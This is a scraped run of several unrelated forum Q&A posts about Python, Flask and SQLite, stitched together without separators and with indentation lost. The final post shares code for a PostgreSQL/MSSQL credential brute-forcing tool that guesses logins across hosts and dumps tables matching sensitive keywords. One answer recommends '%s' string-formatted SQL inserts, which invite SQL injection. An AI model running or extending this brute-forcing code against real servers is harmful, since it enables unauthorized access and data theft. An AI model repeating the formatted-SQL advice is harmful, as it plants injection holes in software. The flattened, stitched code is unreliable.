I'm currently writing an API in Flask, and am currently trying to me my POST request to work. Ideally, it would add a band to the DB with a band_ID, name, genre, number of gigs, and a rating. For some reason, running the proper POST request in postman returns a 405. I didn't even know an API *I made * would tell me I don't have access to a POST I'm writing. Do I need to change anything to make it have access?
from flask import Flask, request
from flask_restful import Api, Resource
import sqlite3
app = Flask(__name__)
api = Api(app)
class Band(Resource):
def get(self, band_id):
conn = sqlite3.connect('database.db')
c = conn.cursor()
c.execute("SELECT * FROM bands WHERE band_id=?", (band_id,))
result = c.fetchone()
if result:
return {"message": result}
else:
return {"message": "Band not found"}
def post(self):
data = request.get_json()
if not all(key in data for key in ('band_name', 'band_genre', 'gigs', 'rating')):
return {"message": "Missing data"}
band_name = data['band_name']
band_genre = data['band_genre']
gigs = data['gigs']
rating = data['rating']
conn = sqlite3.connect('database.db')
c = conn.cursor()
c.execute("INSERT INTO bands (band_name,band_genre,gigs,rating) VALUES (?,?,?,?)", (band_name,band_genre,gigs,rating))
conn.commit()
return {"message": "Success"}
api.add_resource(Band, '/bands/<int:band_id>')
if __name__ == "__main__":
conn = sqlite3.connect('database.db')
c = conn.cursor()
c.execute("DROP TABLE IF EXISTS bands")
c.execute("""CREATE TABLE IF NOT EXISTS bands (
band_id INTEGER PRIMARY KEY,
band_name TEXT,
band_genre TEXT,
gigs INTEGER,
rating INTEGER
)""")
conn.commit()
app.run(debug=True)
I've tried changing the call on postman and fiddling around with my add.resource lines but to no avail. Totally lost on what to do next.
I am trying to store the mitmproxy flows to the database for further processing but when using the following code to insert into the sqlite3 database it's just skipping the insert into the database line and no data gets saved nor any errors are showing.
from mitmproxy.options import Options
from mitmproxy.proxy.config import ProxyConfig
from mitmproxy.proxy.server import ProxyServer
from mitmproxy.tools.dump import DumpMaster
import sqlite3
conn = sqlite3.connect('traffic.db')
c = conn.cursor()
c.execute("""CREATE TABLE IF NOT EXISTS traffic (
id INTEGER PRIMARY KEY,
path,
method,
status,
request,
response
)""")
conn.commit()
class Addon(object):
def __init__(self):
self.num = 1
def request(self, flow):
print("flow.request.path")
print(flow.request.path)
c.execute("INSERT INTO traffic VALUES (null, :path, :method, :status, :request, :response)",
{'path': flow.request.path, 'method': flow.request.method, 'status': flow.response.status_code,
'request': flow.request.get_content(), 'response': flow.response.content})
conn.commit()
flow.request.headers["count"] = str(self.num)
def response(self, flow):
self.num = self.num + 1
flow.response.headers["count"] = str(self.num)
print(self.num)
if __name__ == "__main__":
options = Options(listen_host='0.0.0.0', listen_port=8080, http2=True)
m = DumpMaster(options, with_termlog=False, with_dumper=False)
config = ProxyConfig(options)
m.server = ProxyServer(config)
m.addons.add(Addon())
m.run()
What is the correct way of doing this?
I used your code but a different approach, that I used for writing to text file before.
However, this seems to work, so thank you for the SQL part!
import sqlite3
conn = sqlite3.connect('/home/pi/mitm/traffic.db')
c = conn.cursor()
c.execute("""CREATE TABLE IF NOT EXISTS traffic (
id INTEGER PRIMARY KEY,
path,
method,
status,
request,
response
)""")
conn.commit()
def response(flow):
c.execute("INSERT INTO traffic VALUES (null, :path, :method, :status, :request, :response)",
{'path': flow.request.path, 'method': flow.request.method, 'status': flow.response.status_code,
'request': flow.request.content, 'response': flow.response.content})
conn.commit()
The I use mitmdump instead of mitmproxy this way:
mitmdump -s the_code_above.py
This works for me, hopefully it helps for your case, too.
hi I am a new in python i tried to create a new class that handle with sqlite3 in my read method i try to print some var but is does not print anything can you help me?
here is the code can you fix it and tell me what the problem is
class SQLite_class() :
file_name=''
table_sql_name =''
# con = sqlite3.connect(self.c)
def creat_file_name(self):
self.file_name = input("enter the SQL fille name !")
self.file_name = self.file_name+'.sqlite'
return self.file_name
def conncection(self):
conn = sqlite3.connect(self.file_name)
return conn
def creat_cursor(self):
conn = self.conncection()
cur = conn.cursor()
return cur
def del_table(self):
cur = self.creat_cursor()
cur.execute('DROP TABLE IF EXISTS '+self.table_sql)
def creat_table(self):
cur = self.creat_cursor()
#adding a new option (name of table of more we need to add some {} and use the format function)
cur.execute( '''CREATE TABLE IF NOT EXISTS {} (data TEXT, number INTEGER)'''.format(self.table_sql_name))
self.commiting()
def insrt(self):
cur = self.creat_cursor()
cur.execute('''INSERT INTO {} (data, number) VALUES (?, ?)'''.format(self.table_sql_name) ,('Thunderstruck', 20))
def close(self):
conn = self.conncection()
conn.close()
def commiting(self):
conn = self.conncection()
conn.commit()
def read(self):
cur = self.creat_cursor()
cur.execute('''SELECT data, number FROM {}'''.format(self.table_sql_name))
for row in cur: print(row)
test = SQLite_class()
test.creat_file_name()
test.table_sql_name = 'Track'
test.creat_table()
test.insrt()
test.commiting()
test.read()
test.commiting()
test.close()
This comment # con = sqlite3.connect(self.c) indicates you know what has to be done. I suspect when that didn't work, you went down the rabbit hole of creating connections everywhere. Program should make one db connection. Every time it makes a connection, it loses what came before.
It could declare conn = '', then call conncection() once (and remove it from the other methods; they'll probably need to take conn as an argument). It'll take some try, try again, but it will get you to a better place.
And don't forget to fetch the rows once the SELECT is executed.
from flask import Flask, jsonify, request, url_for, redirect, session, render_template, g
import sqlite3
app = Flask(__name__)
app.config['DATABASE'] = './data.db'
def connect_db():
path = r"C:\Users\Arjun\Documents\flask_app\data.db"
sql = sqlite3.connect(path)
sql.row_factory = sqlite3.Row
return sql
def get_db():
if not hasattr(g, 'sqlite3'):
g.sqlite_db = connect_db()
return g.sqlite_db
#app.teardown_appcontext
def close_db(error):
if hasattr(g, 'sqlite_db'):
g.sqlite_db.close()
#app.route('/home', defaults={'name':'Default'})
#app.route('/home/<name>')
def home(name):
session['name'] = name
return render_template('home.html', name=name, display = False, mylist = [1,2,3,4]
#app.route('/theform5', methods=['GET', 'POST'])
def theform5():
if request.method == 'GET':
return render_template('form.html')
else:
name = request.form['name']
location = request.form['location']
db = get_db()
db.execute("insert into users (name, location) values (?, ?)", [name, location])
db.commit()
return redirect(url_for('home', name=name, location=location))
#app.route('/viewresults')
def viewresults():
db = get_db()
cur = db.execute('select id, name, location from users')
results = cur.fetchall()
return 'The ID is {}. Name is {}. The location is {}. '.format(results[1]['id'], results[1]
['name'], results[1]['location'])
Error in:
return "The ID is {}. Name is {}. The location is {}".format(results[1]['id'],results[1]['name'],results[1]['location'])
IndexError: list index out of range
Though the table can be edited directly through the terminal, it can't be edited when the flask web app is run.
Browser: Chrome
SQLite: v3.30.1
Python: v3.8.1
Flask: v1.1.1
you have a syntax error in your return statement in your home function. missing ')' at the end.
In order to run db.execute you would have to set up the cursor first:
db = get_db()
cursor = db.cursor()
cursor.execute("insert into users (name, location) values (?, ?)", [name, location])
also, maybe your syntax is off, try this:
cursor.execute("insert into users values('%s', '%s')" %(name, location))
Are these not the answers you are looking for?
I am creating a dictionary attacking tool on PostgreSQL. The tool is inspired by the work of m8r0wn - enumdb tool. Mikes tool is aimed at MySQL and MSSQL. I aim to use the same approach he used but modify the actions and output file. The script should
1) Read a CSV file that contains targets and ports, one per line 127.0.0.1,3380.
2) when provided a list of usernames and/or passwords, it will cycle through each targeted host looking for valid credentials. By default, it will use newly discovered credentials to search for sensitive information in the host's databases via keyword searches on the table or column names.
3) This information can then be extracted and reported to a JSON, .csv or .xlsx output file.
I have a semi functional code, but I suspect the PostgreSQL connection function is not working due to the logic behind passing parameters. I am interested in suggestions on how best I could present the tools results as a JSON file.
I understand that in Python, we have several modules available to connect and work with PostgreSQL which include:
Psycopg2
pg8000
py-postgresql
PyGreSQL
ocpgdb
bpgsql
SQLAlchemy
see also https://www.a2hosting.co.za/kb/developer-corner/postgresql/connecting-to-postgresql-using-python
The connection methods I have tried include:
import psycopg2
from psycopg2 import Error
conn = psycopg2.connect(host=host, dbname=db_name, user=_user, password=_pass, port=port)
import pg
conn = pg.DB(host=args.hostname, user= _user, passwd= _pass)
sudo pip install pgdb
import pgdb
conn = pgdb.connect(host=args.hostname, user= _user, passwd= _pass)
I am not sure how to pass the different _user and _pass guesses into the pyscopg2 for instance, without breaking the code.
I have imported the following libraries
import re
import psycopg2
from psycopg2 import Error
import pgdb
#import MySQLdb
import pymssql
import argparse
from time import sleep
from sys import exit, argv
from getpass import getpass
from os import path, remove
from openpyxl import Workbook
from threading import Thread, activeCount
The PgSQL block is as follows:
##########################################
# PgSQL DB Class
##########################################
class pgsql():
def connect(self, host, port, user, passwd, verbose):
try:
con = pgdb.connect(host=host, port=port, user=user, password=passwd, connect_timeout=3)
con.query_timeout = 15
print_success("[*] Connection established {}:{}#{}".format(user,passwd,host))
return con
except Exception as e:
if verbose:
print_failure("[!] Login failed {}:{}#{}\t({})".format(user,passwd,host,e))
else:
print_failure("[!] Login failed {}:{}#{}".format(user, passwd, host))
return False
def db_query(self, con, cmd):
try:
cur = con.cursor()
cur.execute(cmd)
data = cur.fetchall()
cur.close()
except:
data = ''
return data
def get_databases(self, con):
databases = []
for x in self.db_query(con, 'SHOW DATABASES;'):
databases.append(x[0])
return databases
def get_tables(self, con, database):
tables = []
self.db_query(con, "USE {}".format(database))
for x in self.db_query(con, 'SHOW TABLES;'):
tables.append(x[0])
return tables
def get_columns(self, con, database, table):
# database var not used but kept to support mssql
columns = []
for x in self.db_query(con, 'SHOW COLUMNS FROM {}'.format(table)):
columns.append(x[0])
return columns
def get_data(self, con, database, table):
# database var not used but kept to support mssql
return self.db_query(con, 'SELECT * FROM {} LIMIT {}'.format(table, SELECT_LIMIT))
The MSSQL is as follows:
# MSSQL DB Class
class mssql():
def connect(self, host, port, user, passwd, verbose):
try:
con = pymssql.connect(server=host, port=port, user=user, password=passwd, login_timeout=3, timeout=15)
print_success("[*] Connection established {}:{}#{}".format(user,passwd,host))
return con
except Exception as e:
if verbose:
print_failure("[!] Login failed {}:{}#{}\t({})".format(user,passwd,host,e))
else:
print_failure("[!] Login failed {}:{}#{}".format(user, passwd, host))
return False
def db_query(self, con, cmd):
try:
cur = con.cursor()
cur.execute(cmd)
data = cur.fetchall()
cur.close()
except:
data = ''
return data
def get_databases(self, con):
databases = []
for x in self.db_query(con, 'SELECT NAME FROM sys.Databases;'):
databases.append(x[0])
return databases
def get_tables(self, con, database):
tables = []
for x in self.db_query(con, 'SELECT NAME FROM {}.sys.tables;'.format(database)):
tables.append(x[0])
return tables
def get_columns(self, con, database, table):
columns = []
for x in self.db_query(con, 'USE {};SELECT column_name FROM information_schema.columns WHERE table_name = \'{}\';'.format(database, table)):
columns.append(x[0])
return columns
def get_data(self, con, database, table):
return self.db_query(con, 'SELECT TOP({}) * FROM {}.dbo.{};'.format(SELECT_LIMIT, database, table))
The main function block:
def main(args):
try:
for t in args.target:
x = Thread(target=enum_db().db_main, args=(args, t,))
x.daemon = True
x.start()
# Do not exceed max threads
while activeCount() > args.max_threads:
sleep(0.001)
# Exit all threads before closing
while activeCount() > 1:
sleep(0.001)
except KeyboardInterrupt:
print("\n[!] Key Event Detected...\n\n")
exit(0)
if __name__ == '__main__':
version = '1.0.7'
try:
args = argparse.ArgumentParser(description=("""
{0} (v{1})
--------------------------------------------------
Brute force Juggernaut is a PgSQL brute forcing tool.**""").format(argv[0], version), formatter_class=argparse.RawTextHelpFormatter, usage=argparse.SUPPRESS)
user = args.add_mutually_exclusive_group(required=True)
user.add_argument('-u', dest='users', type=str, action='append', help='Single username')
user.add_argument('-U', dest='users', default=False, type=lambda x: file_exists(args, x), help='Users.txt file')
passwd = args.add_mutually_exclusive_group()
passwd.add_argument('-p', dest='passwords', action='append', default=[], help='Single password')
passwd.add_argument('-P', dest='passwords', default=False, type=lambda x: file_exists(args, x), help='Password.txt file')
args.add_argument('-threads', dest='max_threads', type=int, default=3, help='Max threads (Default: 3)')
args.add_argument('-port', dest='port', type=int, default=0, help='Specify non-standard port')
args.add_argument('-r', '-report', dest='report', type=str, default=False, help='Output Report: csv, xlsx (Default: None)')
args.add_argument('-t', dest='dbtype', type=str, required=True, help='Database types currently supported: mssql, pgsql')
args.add_argument('-c', '-columns', dest="column_search", action='store_true', help="Search for key words in column names (Default: table names)")
args.add_argument('-v', dest="verbose", action='store_true', help="Show failed login notices & keyword matches with Empty data sets")
args.add_argument('-brute', dest="brute", action='store_true', help='Brute force only, do not enumerate')
args.add_argument(dest='target', nargs='+', help='Target database server(s)')
args = args.parse_args()
# Put target input into an array
args.target = list_targets(args.target[0])
# Get Password if not provided
if not args.passwords:
args.passwords = [getpass("Enter password, or continue with null-value: ")]
# Define default port based on dbtype
if args.port == 0: args.port = default_port(args.dbtype)
# Launch Main
print("\nStarting enumdb v{}\n".format(version) + "-" * 25)
main(args)
except KeyboardInterrupt:
print("\n[!] Key Event Detected...\n\n")
exit(0)
I am aware that documentation states here http://initd.org/psycopg/docs/module.html states about how connection parameters can be specified. I would like to pass password guesses into the brute class and recursively try different combinations.
PEP-8 asks that you please give classes a name
starting with a capital letter, e.g. Pgsql.
You mentioned that the pgsql connect() method is not working properly,
but didn't offer any diagnostics such as a stack trace.
You seem to be working too hard, given that the sqlalchemy layer
has already addressed the DB porting issue quite nicely.
Just assemble a connect string starting with
the name of the appropriate DB package,
and let sqlalchemy take care of the rest.
All your methods accept con as an argument.
You really want to factor that out as the object attribute self.con.
The db_query() method apparently assumes that
arguments for WHERE clauses already appear, properly quoted, in cmd.
According to Little Bobby's mother,
it makes sense to accept query args according to the API,
rather than worrying about potential for SQL injection.